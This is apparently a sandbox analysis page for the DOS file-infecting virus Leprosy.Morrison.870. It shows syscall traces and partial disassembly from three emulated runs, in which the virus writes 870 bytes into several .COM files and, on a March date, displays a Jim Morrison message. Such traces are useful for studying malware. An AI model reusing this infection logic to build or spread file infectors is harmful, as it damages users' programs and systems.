Sample viewer

vx.netlux.org/Virus.DOS.Leprosy.Morrison.870


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:40:02.462138936Z 44 PC: 12c95 | Get time
0x12c95: cmp byte ptr [0x106], 0
0x12c9a: je 0x12ca1
0x12c9c: cmp dh, 0xf
0x12c9f: jg 0x12caa
0x12ca1: cmp dl, 0
0x12ca4: je 0x12c91
0x12ca6: mov byte ptr [0x106], dl
0x12caa: mov byte ptr [0x295], 4
0x12caf: mov byte ptr [0x29e], 0
0x12cb4: mov cx, 0x27
0x12cb7: mov dx, 0x20a
0x12cba: mov ah, 0x4e
0x12cbc: int 0x21
0x12cbe: cmp ax, 0x12
0x12cc1: je 0x12cc6
0x12cc3: call 0x12ce8
0x12cc6: mov cx, 0x27
0x12cc9: mov dx, 0x210
0x12ccc: mov ah, 0x4e
0x12cce: int 0x21
2018-12-17T22:40:02.46494588Z 78 PC: 12cbe | Find first file
2018-12-17T22:40:02.471189308Z 78 PC: 12cd0 | Find first file
2018-12-17T22:40:02.477347454Z 67 PC: 12cfd | Get or set file attributes
2018-12-17T22:40:02.496795511Z 61 PC: 12d03 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:40:02.503401931Z 63 PC: 12d12 | Read file or device (Read 20 bytes on handle 5)
2018-12-17T22:40:02.509740966Z 62 PC: 12d42 | Close file
2018-12-17T22:40:02.511676594Z 61 PC: 12d4b | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:40:02.518729047Z 64 PC: 12aee | Write file or device (Write 870 bytes on handle 5)
2018-12-17T22:40:02.527011238Z 62 PC: 12d69 | Close file
2018-12-17T22:40:02.534773567Z 67 PC: 12d76 | Get or set file attributes
2018-12-17T22:40:02.539796436Z 79 PC: 12d32 | Find next file
2018-12-17T22:40:02.542671793Z 67 PC: 12cfd | Get or set file attributes
2018-12-17T22:40:02.555576569Z 61 PC: 12d03 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:40:02.562757544Z 63 PC: 12d12 | Read file or device (Read 20 bytes on handle 5)
2018-12-17T22:40:02.568995917Z 62 PC: 12d42 | Close file
2018-12-17T22:40:02.570913861Z 61 PC: 12d4b | Open file (Filename = 'PRINT.COM')
2018-12-17T22:40:02.57826756Z 64 PC: 12aee | Write file or device (Write 870 bytes on handle 5)
2018-12-17T22:40:02.586385991Z 62 PC: 12d69 | Close file
2018-12-17T22:40:02.594185794Z 67 PC: 12d76 | Get or set file attributes
2018-12-17T22:40:02.599551572Z 79 PC: 12d32 | Find next file
2018-12-17T22:40:02.601999084Z 67 PC: 12cfd | Get or set file attributes
2018-12-17T22:40:02.613735904Z 61 PC: 12d03 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:40:02.621612669Z 63 PC: 12d12 | Read file or device (Read 20 bytes on handle 5)
2018-12-17T22:40:02.628538217Z 62 PC: 12d42 | Close file
2018-12-17T22:40:02.630324507Z 61 PC: 12d4b | Open file (Filename = 'HELLO.COM')
2018-12-17T22:40:02.642039335Z 64 PC: 12aee | Write file or device (Write 870 bytes on handle 5)
2018-12-17T22:40:02.650488781Z 62 PC: 12d69 | Close file
2018-12-17T22:40:02.658336393Z 67 PC: 12d76 | Get or set file attributes
2018-12-17T22:40:02.66344121Z 79 PC: 12d32 | Find next file
2018-12-17T22:40:02.66594517Z 67 PC: 12cfd | Get or set file attributes
2018-12-17T22:40:02.67553383Z 61 PC: 12d03 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:40:02.687658856Z 63 PC: 12d12 | Read file or device (Read 20 bytes on handle 5)
2018-12-17T22:40:02.694394691Z 62 PC: 12d42 | Close file
2018-12-17T22:40:02.696610356Z 61 PC: 12d4b | Open file (Filename = 'PHANG.COM')
2018-12-17T22:40:02.704941853Z 64 PC: 12aee | Write file or device (Write 870 bytes on handle 5)
2018-12-17T22:40:02.712938933Z 62 PC: 12d69 | Close file
2018-12-17T22:40:02.720719022Z 67 PC: 12d76 | Get or set file attributes
2018-12-17T22:40:02.726099122Z 42 PC: 12d7b | Get date
0x12d7b: cmp dh, 3
0x12d7e: je 0x12d86
0x12d80: jmp 0x12d9b
0x12d82: nop
0x12d83: jmp 0x12da2
0x12d85: nop
0x12d86: mov ah, 9
0x12d88: mov dx, 0x228
0x12d8b: int 0x21
0x12d8d: mov dx, 0x24d
0x12d90: int 0x21
0x12d92: mov dx, 0x269
0x12d95: int 0x21
0x12d97: mov ah, 0x4c
0x12d99: int 0x21
0x12d9b: mov ah, 9
0x12d9d: mov dx, 0x219
0x12da0: int 0x21
0x12da2: mov ah, 0x4c
0x12da4: int 0x21
2018-12-17T22:40:02.728125458Z 9 PC: 12da2 | Display string (String= 'Stack overflow')
2018-12-17T22:40:02.730610069Z 76 PC: 12da6 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6905,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:00:33.487036444Z 44 PC: 12c95 | Get time
0x12c95: cmp byte ptr [0x106], 0
0x12c9a: je 0x12ca1
0x12c9c: cmp dh, 0xf
0x12c9f: jg 0x12caa
0x12ca1: cmp dl, 0
0x12ca4: je 0x12c91
0x12ca6: mov byte ptr [0x106], dl
0x12caa: mov byte ptr [0x295], 4
0x12caf: mov byte ptr [0x29e], 0
0x12cb4: mov cx, 0x27
0x12cb7: mov dx, 0x20a
0x12cba: mov ah, 0x4e
0x12cbc: int 0x21
0x12cbe: cmp ax, 0x12
0x12cc1: je 0x12cc6
0x12cc3: call 0x12ce8
0x12cc6: mov cx, 0x27
0x12cc9: mov dx, 0x210
0x12ccc: mov ah, 0x4e
0x12cce: int 0x21
2018-12-25T12:00:33.489818889Z 78 PC: 12cbe | Find first file
2018-12-25T12:00:33.495391355Z 78 PC: 12cd0 | Find first file
2018-12-25T12:00:33.501421043Z 67 PC: 12cfd | Get or set file attributes
2018-12-25T12:00:33.527034306Z 61 PC: 12d03 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:00:33.533987391Z 63 PC: 12d12 | Read file or device (Read 20 bytes on handle 5)
2018-12-25T12:00:33.540841934Z 62 PC: 12d42 | Close file
2018-12-25T12:00:33.543524786Z 61 PC: 12d4b | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:00:33.550762312Z 64 PC: 12aee | Write file or device (Write 870 bytes on handle 5)
2018-12-25T12:00:33.557684598Z 62 PC: 12d69 | Close file
2018-12-25T12:00:33.564272595Z 67 PC: 12d76 | Get or set file attributes
2018-12-25T12:00:33.574651422Z 79 PC: 12d32 | Find next file
2018-12-25T12:00:33.577017699Z 67 PC: 12cfd | Get or set file attributes (See above)
2018-12-25T12:00:33.586334548Z 61 PC: 12d03 | Open file (See above)
2018-12-25T12:00:33.597960353Z 63 PC: 12d12 | Read file or device (See above)
2018-12-25T12:00:33.602358045Z 62 PC: 12d42 | Close file (See above)
2018-12-25T12:00:33.603761058Z 61 PC: 12d4b | Open file (See above)
2018-12-25T12:00:33.608831098Z 64 PC: 12aee | Write file or device (See above)
2018-12-25T12:00:33.615120311Z 62 PC: 12d69 | Close file (See above)
2018-12-25T12:00:33.622049035Z 67 PC: 12d76 | Get or set file attributes (See above)
2018-12-25T12:00:33.628473374Z 79 PC: 12d32 | Find next file (See above)
2018-12-25T12:00:33.63153479Z 67 PC: 12cfd | Get or set file attributes (See above)
2018-12-25T12:00:33.640987269Z 61 PC: 12d03 | Open file (See above)
2018-12-25T12:00:33.652997702Z 63 PC: 12d12 | Read file or device (See above)
2018-12-25T12:00:33.659495444Z 62 PC: 12d42 | Close file (See above)
2018-12-25T12:00:33.662783412Z 61 PC: 12d4b | Open file (See above)
2018-12-25T12:00:33.671171796Z 64 PC: 12aee | Write file or device (See above)
2018-12-25T12:00:33.679463557Z 62 PC: 12d69 | Close file (See above)
2018-12-25T12:00:33.68716407Z 67 PC: 12d76 | Get or set file attributes (See above)
2018-12-25T12:00:33.692753307Z 79 PC: 12d32 | Find next file (See above)
2018-12-25T12:00:33.696079027Z 67 PC: 12cfd | Get or set file attributes (See above)
2018-12-25T12:00:33.705371503Z 61 PC: 12d03 | Open file (See above)
2018-12-25T12:00:33.711965337Z 63 PC: 12d12 | Read file or device (See above)
2018-12-25T12:00:33.718636005Z 62 PC: 12d42 | Close file (See above)
2018-12-25T12:00:33.720383431Z 61 PC: 12d4b | Open file (See above)
2018-12-25T12:00:33.732553617Z 64 PC: 12aee | Write file or device (See above)
2018-12-25T12:00:33.741948506Z 62 PC: 12d69 | Close file (See above)
2018-12-25T12:00:33.749819404Z 67 PC: 12d76 | Get or set file attributes (See above)
2018-12-25T12:00:33.754499748Z 42 PC: 12d7b | Get date
0x12d7b: cmp dh, 3
0x12d7e: je 0x12d86
0x12d80: jmp 0x12d9b
0x12d82: nop
0x12d83: jmp 0x12da2
0x12d85: nop
0x12d86: mov ah, 9
0x12d88: mov dx, 0x228
0x12d8b: int 0x21
0x12d8d: mov dx, 0x24d
0x12d90: int 0x21
0x12d92: mov dx, 0x269
0x12d95: int 0x21
0x12d97: mov ah, 0x4c
0x12d99: int 0x21
0x12d9b: mov ah, 9
0x12d9d: mov dx, 0x219
0x12da0: int 0x21
0x12da2: mov ah, 0x4c
0x12da4: int 0x21
2018-12-25T12:00:33.757460849Z 9 PC: 12da2 | Display string (String= 'Stack overflow')
2018-12-25T12:00:33.759974017Z 76 PC: 12da6 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6905,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:00:33.586642669Z 44 PC: 12c95 | Get time
0x12c95: cmp byte ptr [0x106], 0
0x12c9a: je 0x12ca1
0x12c9c: cmp dh, 0xf
0x12c9f: jg 0x12caa
0x12ca1: cmp dl, 0
0x12ca4: je 0x12c91
0x12ca6: mov byte ptr [0x106], dl
0x12caa: mov byte ptr [0x295], 4
0x12caf: mov byte ptr [0x29e], 0
0x12cb4: mov cx, 0x27
0x12cb7: mov dx, 0x20a
0x12cba: mov ah, 0x4e
0x12cbc: int 0x21
0x12cbe: cmp ax, 0x12
0x12cc1: je 0x12cc6
0x12cc3: call 0x12ce8
0x12cc6: mov cx, 0x27
0x12cc9: mov dx, 0x210
0x12ccc: mov ah, 0x4e
0x12cce: int 0x21
2018-12-25T12:00:33.58946695Z 78 PC: 12cbe | Find first file
2018-12-25T12:00:33.595378993Z 78 PC: 12cd0 | Find first file
2018-12-25T12:00:33.601396405Z 67 PC: 12cfd | Get or set file attributes
2018-12-25T12:00:33.616647744Z 61 PC: 12d03 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:00:33.623233232Z 63 PC: 12d12 | Read file or device (Read 20 bytes on handle 5)
2018-12-25T12:00:33.629350037Z 62 PC: 12d42 | Close file
2018-12-25T12:00:33.631168767Z 61 PC: 12d4b | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:00:33.643175319Z 64 PC: 12aee | Write file or device (Write 870 bytes on handle 5)
2018-12-25T12:00:33.651616213Z 62 PC: 12d69 | Close file
2018-12-25T12:00:33.659679149Z 67 PC: 12d76 | Get or set file attributes
2018-12-25T12:00:33.664792761Z 79 PC: 12d32 | Find next file
2018-12-25T12:00:33.66736496Z 67 PC: 12cfd | Get or set file attributes (See above)
2018-12-25T12:00:33.677440885Z 61 PC: 12d03 | Open file (See above)
2018-12-25T12:00:33.684541538Z 63 PC: 12d12 | Read file or device (See above)
2018-12-25T12:00:33.69078796Z 62 PC: 12d42 | Close file (See above)
2018-12-25T12:00:33.69250204Z 61 PC: 12d4b | Open file (See above)
2018-12-25T12:00:33.705798892Z 64 PC: 12aee | Write file or device (See above)
2018-12-25T12:00:33.714342329Z 62 PC: 12d69 | Close file (See above)
2018-12-25T12:00:33.722329738Z 67 PC: 12d76 | Get or set file attributes (See above)
2018-12-25T12:00:33.727747113Z 79 PC: 12d32 | Find next file (See above)
2018-12-25T12:00:33.734895168Z 67 PC: 12cfd | Get or set file attributes (See above)
2018-12-25T12:00:33.744514203Z 61 PC: 12d03 | Open file (See above)
2018-12-25T12:00:33.752278552Z 63 PC: 12d12 | Read file or device (See above)
2018-12-25T12:00:33.759597762Z 62 PC: 12d42 | Close file (See above)
2018-12-25T12:00:33.762084051Z 61 PC: 12d4b | Open file (See above)
2018-12-25T12:00:33.778631688Z 64 PC: 12aee | Write file or device (See above)
2018-12-25T12:00:33.787215328Z 62 PC: 12d69 | Close file (See above)
2018-12-25T12:00:33.795311361Z 67 PC: 12d76 | Get or set file attributes (See above)
2018-12-25T12:00:33.800822265Z 79 PC: 12d32 | Find next file (See above)
2018-12-25T12:00:33.80421511Z 67 PC: 12cfd | Get or set file attributes (See above)
2018-12-25T12:00:33.814050367Z 61 PC: 12d03 | Open file (See above)
2018-12-25T12:00:33.821134088Z 63 PC: 12d12 | Read file or device (See above)
2018-12-25T12:00:33.831169277Z 62 PC: 12d42 | Close file (See above)
2018-12-25T12:00:33.833274499Z 61 PC: 12d4b | Open file (See above)
2018-12-25T12:00:33.845189733Z 64 PC: 12aee | Write file or device (See above)
2018-12-25T12:00:33.853841953Z 62 PC: 12d69 | Close file (See above)
2018-12-25T12:00:33.86209994Z 67 PC: 12d76 | Get or set file attributes (See above)
2018-12-25T12:00:33.867033577Z 42 PC: 12d7b | Get date
0x12d7b: cmp dh, 3
0x12d7e: je 0x12d86
0x12d80: jmp 0x12d9b
0x12d82: nop
0x12d83: jmp 0x12da2
0x12d85: nop
0x12d86: mov ah, 9
0x12d88: mov dx, 0x228
0x12d8b: int 0x21
0x12d8d: mov dx, 0x24d
0x12d90: int 0x21
0x12d92: mov dx, 0x269
0x12d95: int 0x21
0x12d97: mov ah, 0x4c
0x12d99: int 0x21
0x12d9b: mov ah, 9
0x12d9d: mov dx, 0x219
0x12da0: int 0x21
0x12da2: mov ah, 0x4c
0x12da4: int 0x21
2018-12-25T12:00:33.870294204Z 9 PC: 12d8d | Display string (String= ' Jim Morrison...portami con te...')
2018-12-25T12:00:33.875795446Z 9 PC: 12d92 | Display string (String= ' nelle tue tenebre')
2018-12-25T12:00:33.880359108Z 9 PC: 12d97 | Display string (String= ' (CJ '72)')
2018-12-25T12:00:33.886577776Z 76 PC: 12d9b | Terminate with return code (Return code = '36')